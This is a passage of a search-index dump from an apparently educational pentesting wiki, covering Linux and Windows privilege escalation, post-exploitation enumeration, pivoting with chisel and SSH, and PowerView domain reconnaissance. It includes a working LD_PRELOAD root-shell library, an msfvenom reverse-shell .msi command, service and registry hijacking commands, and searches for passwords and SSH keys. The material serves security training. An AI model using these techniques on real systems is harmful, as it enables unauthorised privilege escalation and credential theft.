escalating our privileges:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing Linux Capabilities » Introduction","id":"174","title":"Introduction"},"175":{"body":"The LD_PRELOAD environment variable can be used to tell the dynamic linker to load specific libraries before any others. By default, programmes run with sudo will be executed in a clean, minimal environment which is specified by env_reset when running sudo -l. However, env_keep may be used to inherit some environment variables from the parent process. If LD_PRELOAD is specified together with env_keep, then we can compile our own malicious dynamic library and set LD_PRELOAD to it. Therefore, when we execute a binary with sudo, our library will be loaded before any other library and its initialisation function will be invoked with root permissions.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Escalation via LD_PRELOAD » Introduction","id":"175","title":"Introduction"},"176":{"body":"Writing the library is a fairly simple task. All we need to do is write an _init function in a C file. This procedure will contain the code we want to be executed when the library is loaded. #include \n#include \n#include void _init()\n{ unsetenv(\"LD_PRELOAD\"); // Unset LD_PRELOAD to avoid an infinite loop setgid(0); // Set root permissions setuid(0); // Set root permissions system(\"/bin/bash\");\n} We begin by unsetting the LD_PRELOAD variable from the environment. This is to preclude an infinite loop when /bin/bash is invoked. If our library didn't unset LD_PRELOAD, then when /bin/bash is called, our library will again be loaded first and then proceed onto launching /bin/bash yet again, which will again load our library and so on. The next two lines set the user and group IDs to those of root which ensures that the next commands are run with root privileges. Finally, system is called in order to spawn a bash shell. We now need to compile this file as a shared library: gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles At last, we can invoke any binary with sudo and specify the path to our library as LD_PRELOAD. Note that the path to the library must be specified as an absolute path.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Escalation via LD_PRELOAD » Writing the Malicious Library","id":"176","title":"Writing the Malicious Library"},"177":{"body":"Once you have gained access to a system, it is paramount to look for other credentials which may be located on the system. These may be hidden in the Windows Registry, within log or configuration files, and more. Moreover, you should check to see if any credentials you have previously found work with anything else. You should also check if you have access to the Windows SYSTEM or SAM files or any of their backups, since those will contain the hashes for users on the system. If so, you might be able to perform a pass-the-hash attack or simply crack them. If the compromised system is a Windows Server, you should look for any stored credentials which can be used with RunAs. You should check the Windows build and version, see if there are any kernel exploits available. You should then move onto enumerating misconfigurations in services and other Windows-specific vectors. If none of these bear any fruit, you should look at the programmes installed on the system, enumerate them for misconfigurations, explore their versions and any exploits which may be available. If none are found, you might consider reverse engineering and binary exploitation as a last resort. Finally, if you have gained access as a local administrator, you should proceeding to looking for ways to bypass UAC . In essence: Credentials Reused Credentials Credentials in Configuration or Log files Credentials in the Windows Registry Credentials from Windows SAM and SYSTEM files Pass-the-hash attacks Stored Credentials (Windows Servers) Kernel Exploits Misconfigurations Services AutoRuns Startup Applications Scheduled Tasks AlwaysInstallElevated Group Policy Bypassing UAC","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Methodology","id":"177","title":"Methodology"},"178":{"body":"Windows Services allow for the creation of continuously running executable applications. These applications have the ability to be automatically started upon booting, they may be paused and restarted, and they lack a user interface. In order for a service to function properly, it needs to be associated with a system or user account. There are a few common built-in system accounts that are used to operate services such as LocalService, NetworkService, and LocalSystem. The following table describes the default secure access rights for accounts on a Windows system: Account Permissions Local Authenticated Users (including LocalService and Network Service) READ_CONTROL SERVICE_ENUMERATE DEPENDENTS SERVICE_INTERROGATE SERVICE_QUERY_CONFIG SERVICE_QUERY_STATUS SERVICE_USER_DEFINED_CONTROL Remote Authenticated Users Same as those for Local Authenitcated Users. LocalSystem READ_CONTROL SERVICE_ENUMERATE DEPENDENTS SERVICE_INTERROGATE SERVICE_PAUSE_CONTINUE SERVICE_QUERY_CONFIG SERVICE_QUERY_STATUS SERVICE_START SERVICE_STOP SERVICE_USER_DEFINED_CONTROL Administrators DELETE READ_CONTROL SERVICE_ALL_ACCESS WRITE_DAC WRITE_OWNER Moreover, a registry entry exists for each service in HKLM\\SYSTEM\\CurrentControlSet\\Services.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Introduction","id":"178","title":"Introduction"},"179":{"body":"In general, manual enumeration of Windows services is a rather cumbersome process, so I suggest that you use a tool for automation such as WinPEAS . winpeas.exe servicesinfo The permissions a user has on a specific service can be inspected via the AccessChk Windows Utility. acceschk.exe /accepteula -uwcqv ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Enumeration","id":"179","title":"Enumeration"},"18":{"body":"There are two types of ports depending on the transport-layer protocol that they support. Both TCP and UDP ports range from 0 to 65535 but they are completely separate. For example, DNS uses UDP port 53 for queries but it uses TCP port 53 for zone transfers. To scan UDP ports, nmap requires elevated privileges and the -sU flag. nmap -sU Note Due to the nature of the protocol, UDP scanning takes a lot longer than TCP does.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » TCP vs UDP","id":"18","title":"TCP vs UDP"},"180":{"body":"This is a vulnerability which can be used to force a misconfigured service to execute an arbitrary programme in lieu of its intended one, as long as the path to that executable contains spaces. On its own, this does not allow for privilege escalation, but it becomes a really powerful tool when the misconfigured service is set to run with system privileges. Let's take a look at the following path: C:\\Program Files\\Vulnerable Service\\service.exe If this path was specified to the service in quotation marks, \"C:\\Program Files\\Vulnerable Service\\service.exe\", then Windows will treat it correctly, executing the service.exe file in the C:\\Program Files\\Vulnerable Service directory. However, Windows is not the sharpest tool in the box and if the path is provided without quotation marks, then it will see ambiguity in what it is supposed to execute. The path will be split at each space character - the first segment will be treated as the executable's name and the rest will be seen as command-line arguments to be passed to it. So at first, Windows will try to execute the following: C:\\Program.exe Files\\Vulnerable Service\\service.exe Once Windows determines that the C:\\Program.exe file does not exist, it will look for the next space character, treat the characters up to it as the new path and try to execute it again: C:\\Program Files\\Vulnerable.exe Service\\service.exe Now, this is process is recursive until a file is successfully executed or the end of the path has been reached. If we are able to create a malicious executable in any of the possible paths that Windows will traverse, then we can hijack the service before the intended file is found. Once you have identified a vulnerable service, you can query to confirm that the path is indeed unquoted. Let's check our access to the possible directories that will be probed by Windows: accesschk.exe /accepteula -uwdq While we cannot write within the C:\\ or C:\\Program Files directories (meaning that we cannot create C:\\Program.exe or C:\\Program Files\\Unquoted.exe), we do have write access to C:\\Program Files\\Unquoted Path Service\\. What this entails is our ability to create a Common.exe binary inside this directory and, since the initial path was unquoted, the path C:\\Program Files\\Unquoted Path Service\\Common.exe will be probed before C:\\Program Files\\Unquoted Path Service\\Common Files\\unquotedpathservice.exe and once Windows finds our malicious executable there, it will be executed with the service's permissions. If we couldn't restart the service, then we could have simply waited for something else to execute it.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Unquoted Service Paths » Unquoted Service Paths","id":"180","title":"Unquoted Service Paths"},"181":{"body":"As previously mentioned, each service is associated with a registry entry in the Windows Registry which is located at HKLM\\SYSTEM\\CurrentControlSet\\Services\\. This entry is essentially the configuration of the service and if it is writable, then it can be abused by an adversary to overwrite the path to the binary application of the service with a malicious one. Querying regsvc reveals that it is running with system privileges and its registry entry is writable by all logged-on users (NT AUTHORITY\\INTERACTIVE). All we need to do now is overwrite the ImagePath registry key in the service's entry to point to our malicious executable: reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\ /v ImagePath /t REG_EXPAND_SZ /d /f Restart the service and catch the shell: net start regsvc","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Weak Registry Permissions » Weak Registry Permissions","id":"181","title":"Weak Registry Permissions"},"182":{"body":"This is a technique which leverages misconfigurations in the service permissions for a specific user. If permissions for a specific user differ from the ones described in the table here , then they may manifest as a possible vulnerability. To identify such services, it is useful to use WinPEAS. It appears that user has write access to the service daclsvc and can also start the service. We can query the service to see what user account is actually executing it: sc qc It appears that the service is running as LocalSystem which is an account with more privileges than our user account. If we can write to the service, then we can alter its configuration and change the path to the executable which is supposed to be run: sc config binpath=\"\\\"\\\"\" All we now need to do is setup a listener and run the service: net start And we get a system shell back:","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Insecure Service Permissions » Insecure Service Permissions","id":"182","title":"Insecure Service Permissions"},"183":{"body":"The binary application executed by a service is considered insecure when an adversary has write access to it when they shouldn't. This means that an attacker can simply replace the file with a malicious executable. If the service is configured to run with system privileges, then those privileges will be inherited by the attacker's executable! All we need to do is simply replace the legitimate executable with a malicious one and then start the service.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Insecure Service Executable Permissions » Introduction","id":"183","title":"Introduction"},"184":{"body":"AutoRun application are programmes which have been set up to automatically execute when a user logs in for the first time after booting the system. This is typically done so that the application can look for updates and update itself if necessary. For example, Steam, Spotify, and Discord, all set this up upon installation. On its own, this does not pose a security risk. Where the real vulnerabilities lies is within AutoRuns which are writable by anyone. AutoRuns can be enumerated by querying the registry: reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Now all we need to do is generate the malicious executable and replace the AutoRun programme with it. Note that in order for the exploit to work, an administrator would need to log in. Now, as soon as the administrator logs in, we will get an elevated shell.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » AutoRun Programmes » Introduction","id":"184","title":"Introduction"},"185":{"body":"Windows has a group policy which, when enabled, allows a user to install a Microsoft Windows Installer Package (.msi file) with elevated privileges. This poses a security risk because an adversary can simply generate a malicious .msi file and execute it with admin privileges. In order to check for this vulnerability, one need only query the following registry keys: reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\nreg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated The AlwaysInstallElevated policy appears enabled, so we can generate a malicious .msi executable. One way to do this is through Metasploit: msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f msi -o reverse.msi Next, transfer the executable to the target machine and execute it with msiexec: msiexec /quiet /qn /i ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » AlwaysInstallElevated Group Policy » Introduction","id":"185","title":"Introduction"},"186":{"body":"Kernel exploits are one of the most trivial privilege escalation paths available. One of the first things you should do when seeking for a privilege escalation vector is to look at the kernel version as well as any installed patches and determine if it is vulnerable to a known kernel exploit. Plenty of exploits can be found just by searching up the kernel version, but a cheat sheet which I like can be found here . Naturally, the exploitation of a kernel exploit is highly specific on a case-by-case basis. Once you have identified that the system is vulnerable to a known kernel exploit, you will need to find the exploit code.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Kernel Exploits » Introduction","id":"186","title":"Introduction"},"187":{"body":"Windows Scheduled Tasks allow for the periodic execution of scripts. These can be manually enumerated via the following command: schtasks /query /fo LIST /v A scheduled task is of interest when it is executed with elevated privileges but we have write access to the script it executes. This script is fairly simple, so we can just append a line to it which executes a malicious executable. When the time for the scheduled task comes, we will catch an elevated shell.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Scheduled Tasks » Introduction","id":"187","title":"Introduction"},"188":{"body":"User Account Control (UAC) is a security measure introduced in Windows Vista which aims to prevent unauthorised changes to the operating system. It ensures that any such changes require the assent of the administrator or a user who is part of the local administrators group. Administrative privileges in Windows are a bit different from those in Linux. Even if an adversary manages to execute some code from an administrator account, this code will not run with elevated privileges, unless it was \"run as Administrator\"-ed. When an unprivileged user attempts to run a programme as administrator, they will be prompted by UAC to enter the administrator's password. However, if the user is privileged (they are an administrator), they will still be prompted with the same UAC prompt, but it will ask them for consent in lieu of a password. Essentially, an administrative user will need to click \"Yes\" instead of typing their password. What is described so far is the default behaviour. UAC, however, has different protection levels which can be configured. Now there are 3 (two of the options are the same but with different aesthetics) options. The first option, and the most strict, is Always Notify. If UAC is set to this, then any programme which tries to run with elevated privileges will beget a UAC prompt - including Windows built-in ones. Next is the default setting - Notify me when application try to make changes to my computer. Under this configuration, regular applications will still cause a UAC prompt to show up whenever run as administrator, however, Windows built-in programmes can be run with elevated privileges without such a prompt. Following is another option which is the exact same as this one, but the UAC prompt will not dim the screen. This is useful for computers for which dimming the screen is not exactly a trifling task. Finally, the Never Notify means that a UAC prompt will never be spawned no matter who is trying to run the application with elevated privileges. UAC can be bypassed if an adversary already has access to a user account which is part of the local administrators group and UAC is configured to the default setting.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Bypassing UAC » Introduction","id":"188","title":"Introduction"},"189":{"body":"There are many tools for bypassing UAC and which one is to be used depends on the Windows build and version. One such tool which has lots of methods for bypassing UAC is UACMe . You will need to build it from source using Visual Studio, meaning that you will need a Windows machine in order to compile it.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Bypassing UAC » Bypassing UAC","id":"189","title":"Bypassing UAC"},"19":{"body":"When scanning, nmap will determine that a port is in one of the following states: open - an application is actively listening for TCP connections, UDP datagrams or SCTP associations on this port closed - the port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it filtered - Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. Usually, the filter sends no response, so Nmap needs to resend the probe a few times in order to be sure that it wasn't dropped due to traffic congestion. This slows the scan drastically unfiltered - the port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, used for mapping firewall rulesets, may put ports in this state open|filtered - Nmap is unable to determine whether the port is open or filtered. This occurs for scan types in which open ports give no response closed|filtered - Nmap is unable to determine whether the port is closed or filtered. It is only used for the IP ID idle scan. By default, nmap scans only the 1000 most common TCP ports. One can scan specific ports by listing them separated by commas directly after the -p flag. nmap -pport1,port2,... If no ports are specified after the -p flag, nmap will scan all ports (either UDP or TCP depending on the type of scan). nmap -p ","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » Port States","id":"19","title":"Port States"},"190":{"body":"Windows Startup applications are very similar to AutoRun Programmes , however, they are executed every time a user logs in. If we can write to the Startups directory, then we can place a malicious executable there which will be executed upon the next login. If the next user to log in is an administrator, then we will gain elevated privileges. To check for write access to the Startups directory, we can use accesschk: C:\\PrivEsc\\accesschk.exe /accepteula -d \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\" All we need to do is place a malicious executable in the directory and wait for an admin to log in.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Startup Applications » Introduction","id":"190","title":"Introduction"},"191":{"body":"Windows Servers have capabilities to store credentials using a built-in utility called cmdkey . On its own, cmdkey is rather useless to an adversary - you can only really use it to list what credentials are stored but not actually reveal them. cmdkey /list The real deal is another built-in utility called Runas . It allows one user to execute a binary with the permissions of another and, what is essential here, this can be achieved with only stored credentials. One doesn't even need to know what the credentials are - so long as a user has their credentials stored, then they can be used to execute programmes as that user. runas /savedcred /user: ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Stored Credentials » Introduction","id":"191","title":"Introduction"},"192":{"body":"Windows Access Tokens are objects which describe the security context in which a thread or process is run. The information within an access token identifies the user and their privileges of said process or thread. Upon each successful user log-on, an access token for the user is generated and every process executed by this user will contain a copy of this token called the primary token . This token is used by the system to inspect the privileges of the process when the process tries to interact with something which may require certain privileges. However, threads of the process are allowed to use a second token, called an impersonation token , to interact with objects as if they had a different security context and different privileges. This is only allowed when the process has the SeImpersonatePrivilege. As with UAC bypassing , exploiting token impersonation is highly dependent on the Windows build and version. However, the most infamous exploits are the Potato exploits .","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Token Impersonation » Introduction","id":"192","title":"Introduction"},"193":{"body":"","breadcrumbs":"Post Exploitation » Enumeration","id":"193","title":"Post Exploitation"},"194":{"body":"There are plenty of tools which can be used for automating post-exploitation enumeration on Linux machines.","breadcrumbs":"Post Exploitation » Enumeration » Linux » Introduction","id":"194","title":"Introduction"},"195":{"body":"LinPEAS is an amazing tool for automation enumeration. It is written in Bash which means that it requires no additional dependencies and can be freely run. In order to acquire the latest version of LinPEAS, run the following command: wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh By default, running LinPEAS will perform many checks on the system and spit out a deluge of information. However, the tool can also be used to only perform specific tasks using the -o argument. Enumerate system information: ./linpeas.sh -o system_information Enumerate containers on the machine: ./linpeas.sh -o container Enumerate cloud platforms: ./linpeas.sh -o cloud Enumerate available software: ./linpeas.sh -o software_information Enumerate processes, cronjobs, services, and sockets: ./linpeas.sh -o procs_crons_timers_srvcs_sockets Enumerate network information: ./linpeas.sh -o network_information Enumerate user information: ./linpeas.sh -o users_information Enumerate interesting files: ./linpeas.sh -o interesting_files","breadcrumbs":"Post Exploitation » Enumeration » Linux » Linux Enumeration with LinPEAS","id":"195","title":"Linux Enumeration with LinPEAS"},"196":{"body":"Find all files in a directory which contain \"pass\" or \"password\", ignoring case: grep --color=auto -rnw '' -ie \"password\\|pass\" --color=always 2>/dev/null Find all files in a directory which contain \"pass\" or \"password\" in their name, ignoring case: find / -name \"*pass*\" 2>/dev/null","breadcrumbs":"Post Exploitation » Enumeration » Linux » Hunting Down Sensitive Files » Finding Files Containing Passwords","id":"196","title":"Finding Files Containing Passwords"},"197":{"body":"find / -name id_rsa 2>/dev/null","breadcrumbs":"Post Exploitation » Enumeration » Linux » Hunting Down Sensitive Files » Finding SSH Keys","id":"197","title":"Finding SSH Keys"},"198":{"body":"System enumeration is a crucial, typically first, step in the enumeration phase of post-exploitation.","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Introduction","id":"198","title":"Introduction"},"199":{"body":"cat /etc/issue","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating the Distribution Version","id":"199","title":"Enumerating the Distribution Version"},"2":{"body":"You should only make changes inside the eight category folders under the Notes/ directory. Minor edits to already existing content outside of the aforementioned allowed directories are permitted as long as they do not bring any semantic change - for example fixing typos.","breadcrumbs":"Cyberclopaedia » Contributing » In-Scope","id":"2","title":"In-Scope"},"20":{"body":"This is the type of scan which nmap defaults to when run with elevated privileges and is also also referred to as a \"stealth scan\". Nmap sends a SYN packet to the target, initiating a TCP connection. The target responds with SYN ACK, telling Nmap that the port is accessible. Finally, Nmap terminates the connection before it's finished by issuing an RST packet. This type of scan can also be specified using the -sS option. Note Despite its moniker, a SYN scan is no longer considered \"stealthy\" and is quite easily detected nowadays.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » SYN Scan » SYN Scan","id":"20","title":"SYN Scan"},"200":{"body":"uname -a cat /proc/version","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating Linux Kernel Version Information","id":"200","title":"Enumerating Linux Kernel Version Information"},"201":{"body":"lscpu","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating CPU Architecture","id":"201","title":"Enumerating CPU Architecture"},"202":{"body":"ps aux","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating Running Services","id":"202","title":"Enumerating Running Services"},"203":{"body":"List files owned by a certain user in a directory: find -user 2>/dev/null List files owned by a certain user in a directory (without /proc): find -user 2>/dev/null | grep -v \"/proc\" List files owned by a certain group in a directory: find -group 2>/dev/null find -group 2>/dev/null | grep -v \"/proc\" # ignore /proc","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » File System Enumeration","id":"203","title":"File System Enumeration"},"204":{"body":"whoami id","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Enumerate User Name and Group","id":"204","title":"Enumerate User Name and Group"},"205":{"body":"sudo -l","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Enumerate Commands Runnable as Root","id":"205","title":"Enumerate Commands Runnable as Root"},"206":{"body":"cat /etc/passwd","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » List Users on the Machine","id":"206","title":"List Users on the Machine"},"207":{"body":"history","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Get History of Commands the User Has Run","id":"207","title":"Get History of Commands the User Has Run"},"208":{"body":"Get a list of the network interfaces connected to the machine with their IPs and MACs: ip a Get a list of the machines that the victim has been interacting with (print the ARP table): ip neigh","breadcrumbs":"Post Exploitation » Enumeration » Linux » Network Enumeration » List Network Interfaces and Network Information","id":"208","title":"List Network Interfaces and Network Information"},"209":{"body":"netstat -ano","breadcrumbs":"Post Exploitation » Enumeration » Linux » Network Enumeration » List Open Ports","id":"209","title":"List Open Ports"},"21":{"body":"This is the default scan for nmap when it does not have elevated privileges. It initiates a full TCP connection and as a result can be slower. Additionally, it is also logged at the application level. This type of scan can also be specified via the -sT option.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » TCP Connect Scan » TCP Connect Scan","id":"21","title":"TCP Connect Scan"},"210":{"body":"Plenty of automated tools can be found for enumerating Windows machines. They are a bit more diverse than those available for Linux - there are precompiled binaries (.exes) available, but there are also PowerShell scripts and many more.","breadcrumbs":"Post Exploitation » Enumeration » Windows » Introduction","id":"210","title":"Introduction"},"211":{"body":"WinPEAS is an incredible tool for enumerating Windows machines. It comes in two flavours - .bat and .exe. It doesn't really matter which one you are going to run - both will do the job just fine - however, the .exe file requires .Net version 4.5.2 or later to be installed on the machine. Enumerating system information: winpeas.exe systeminfo","breadcrumbs":"Post Exploitation » Enumeration » Windows » Windows Enumeration with WinPEAS","id":"211","title":"Windows Enumeration with WinPEAS"},"212":{"body":"systeminfo","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate System Information","id":"212","title":"Enumerate System Information"},"213":{"body":"wmic qfe","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate Patches","id":"213","title":"Enumerate Patches"},"214":{"body":"wmic logicaldisk get caption,description,providername","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate Drives","id":"214","title":"Enumerate Drives"},"215":{"body":"Pivoting is the act of establishing access to internal resources on a network through a compromised machine. This allows an adversary to exifltrate local data which is usually not accessible from the outside world. Moreover, it permits the use of hacking tools as if they were running from inside the network.","breadcrumbs":"Post Exploitation » Pivoting » Introduction","id":"215","title":"Introduction"},"216":{"body":"Chisel is an open-source application for port tunneling. You can get it from https://github.com/jpillora/chisel. Clone the repo and follow the installation instructions. In order to port tunnel with chisel, you need to have a copy of the binary on both the attacking and the compromised machines.","breadcrumbs":"Post Exploitation » Pivoting » Tunneling with Chisel » Introduction","id":"216","title":"Introduction"},"217":{"body":"Run the following command on the attacking machine: chisel server -p [Listen Port] --reverse & This will setup a chisel server on Listen Port. On the compromised systenm run: chisel client [Attacker IP]:[Listen Port] R:[Local Host]:[Local Port]:[Remote Host]:[Remote Port] & This will endeavour to connect to a chisel server at the specified Attacker IP and Listen Port. Once it has connected to the remote chisel server, the chisel server will open Remote Port on the Remote Host and tunnel it to the Local Port of Local Host. From now on, any traffic sent to Remote Port on the Remote Host will be forwarded to the Local Port of Local Host. Chisel also defines some defaults for these values, which means you can omit some of them: Local Host - 0.0.0.0 Remote Host - 0.0.0.0 (server localhost) As an example, suppose you start a chisel server on your attacking machine (10.10.10.189) on port 1337, and want to gain access to port 3306 on the compromised machine. On the attacking machine you run: chisel server -p 1337 --reverse & On the compromised system you will run: chisel client 10.10.10.189:1337 R:localhost:3306:localhost:31337 & The above basically translates to \"Forward any traffic intended for port 31337 localhost on my attacking machine to port 3306 on the localhost of the compromised system\".","breadcrumbs":"Post Exploitation » Pivoting » Tunneling with Chisel » Creating a reverse tunnel","id":"217","title":"Creating a reverse tunnel"},"218":{"body":"SSH Tunneling is a port forwarding technique which uses SSH. It can be used to access internal resources within a network if you have SSH access to a host inside it. Additionally, the tunnel goes through a pre-existing SSH connection and can thus be utilised for bypassing firewalls.","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Introduction","id":"218","title":"Introduction"},"219":{"body":"Local port forwarding is used when you want to create a bridge to a port that hosts an internal service which does not accept connections from outside the network. For this to work, you need to specify two ports - one for the service on the remote machine which you want to access and one on your local machine to create the listener on. Any packets sent to your machine on the local port will be tunneled to the port on the remote machine through the SSH connection. Whilst you will still receive any responses to requests you send through the tunnel, you won't be able to receive arbitrary data that gets sent to the remote port. The syntax is fairly simple: ssh -L [LOCAL_IP:]LOCAL_PORT:DESTINATION:DESTINATION_PORT SSH_SERVER [LOCAL_IP:] - the interface you want to open the listener on. This can be omitted and defaults to localhost. LOCAL_PORT - the port you want to start the listener on. Any traffic sent to this port will be forwarded through the tunnel. DESTINATION - the destination host. This does not need to (and most likely won't) match SSH_SERVER, since you are now trying to access an internal resource. DESTINATION_PORT - the port on the remote machine, that you want to access through the tunnel. You can also add -N -f to the above command, so that ssh runs in the background and only opens the tunnel without giving an interface for typing commands. We have now established a tunnel on my Kali machine's port 8080, which will forward any traffic to 192.168.129.137:1337, which is my ubuntu server. So let's see if we can access the web page. Wait, what? We just created the tunnel, but it does not seem to work? Well, remember how the DESTINATION does not need to match the server's IP? This is because the DESTINATION is where the traffic is sent after it gets to the remote machine. In a sense, the remote machine is now the sender and not us. Therefore, in order to access a resource internal to the network, we would need to change DESTINATION to something like localhost or another computer's IP. Let's again check to see if we have access to the resource hidden behind localhost:1337 on the Ubuntu server...","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Local Port Forwarding","id":"219","title":"Local Port Forwarding"},"22":{"body":"These scan types make use of a small loophole in the TCP RFC to differentiate between open and closed ports. RFC 793 dictates that \"if the destination port state is CLOSED .... an incoming segment not containing a RST causes a RST to be sent in response.” It also says the following about packets sent to open ports without the SYN, RST, or ACK bits set: “you are unlikely to get here, but if you do, drop the segment, and return\". Scanning systems compliant with this RFC text, any packet not containing SYN, RST, or ACK bits will beget an RST if the port is closed and no response at all if the port is open. So long as none of these flags are set, any combination of the other three (FIN, PSH, and URG) is fine. These scan types can sneak through certain non-stateful firewalls and packet filtering routers and are a little more stealthy than even a SYN scan. However, not all systems are compliant with RFC 793 - some send a RST even if the port is open. Some operating systems that do this include Microsoft Windows, a lot of Cisco devices, IBM OS/400, and BSDI. These scans will work against most Unix-based systems. It is not possible to distinguish an open from a filtered port with these scans, hence why the port states will be open|filtered.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Overview","id":"22","title":"Overview"},"220":{"body":"Remote port forwarding is sort of the reverse of local port forwarding. A tunnel is opened and any traffic sent to the tunnel port on the remote machine will be forwarded to the local machine. In the exact same way as above, once the traffic is tunneled, the local machine becomes the sender. Therefore, remote port forwarding is more useful when you want to receive traffic from inside the network, rather than injecting it. You will be able to actively receive any data that is sent to the remote port, but you won't be able to send arbitrary data through the tunnel yourself. The syntax is also very similar: ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT SSH_SERVER [REMOTE:] - the remote host to listen on. This resembles the LOCAL_IP when local port forwarding and can be omitted. If left empty, the remote machine will bind on all interfaces REMOTE_PORT - the port on the remote machine that is part of the tunnel. DESTINATION:DESTINATION_PORT - the host and port that the traffic should be sent to once it gets from the remote machine back to the local machine Once again, you can add -N -f to the command, so that ssh runs in the background and only opens the tunnel without giving an interface for typing commands.","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Remote Port Forwarding","id":"220","title":"Remote Port Forwarding"},"221":{"body":"","breadcrumbs":"Post Exploitation » Active Directory (AD) » Active Directory (AD)","id":"221","title":"Active Directory (AD)"},"222":{"body":"PowerView is a PowerShell tool for the enumeration of Windows domains. The script can be downloaded from https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1. Before running, you need to bypass PowerShell's execution policy: powershell -ep bypass Load the script using . .\\PowerView.ps1 Normally, you'd be running these commands through some sort of shell, but for the sake of simplicity, I will show them all run locally.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Overview","id":"222","title":"Overview"},"223":{"body":"Get-NetDomain","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Information","id":"223","title":"Get Domain Information"},"224":{"body":"Get-NetDomainController","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Controller Information","id":"224","title":"Get Domain Controller Information"},"225":{"body":"Get-DomainPolicy You can also get information about a specific policy with the following syntax: (Get-DomainPolicy).\"policy name\"","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Retrieve Domain Policy Information","id":"225","title":"Retrieve Domain Policy Information"},"226":{"body":"Get-NetUser The output of this command is rather messy, but you can pull specific information with the following syntax: Get-NetUser | select However, there is an even better way to do that.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Users Information","id":"226","title":"Get Users Information"},"227":{"body":"Get a specific properties of all the users: Get-DomainUser -Properties ,,... It is useful to always have the samaccountname as the first property selected, so that you can easily match properties with specific users.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get User Property Information","id":"227","title":"Get User Property Information"},"228":{"body":"Get-DomainComputer | select samaccountname, operatingsystem","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Machines","id":"228","title":"Get Domain Machines"},"229":{"body":"Get-NetGroup | select samaccountname, admincount, description","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Groups","id":"229","title":"Get Groups"},"23":{"body":"Doesn't set any flags. Since null scanning does not set any set flags, it can sometimes penetrate firewalls and edge routers that filter incoming packets with certain flags. It is invoked with the -sN option:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Null Scan","id":"23","title":"Null Scan"},"230":{"body":"Get-NetGPO | select ,,...","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Group Policy Information","id":"230","title":"Get Group Policy Information"},"231":{"body":"https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Additional Resources","id":"231","title":"Additional Resources"},"232":{"body":"Bloodhound is a tool used for finding relationships and patterns within data from an Active Directory environment. It is run on the attacker's machine and accessed through a 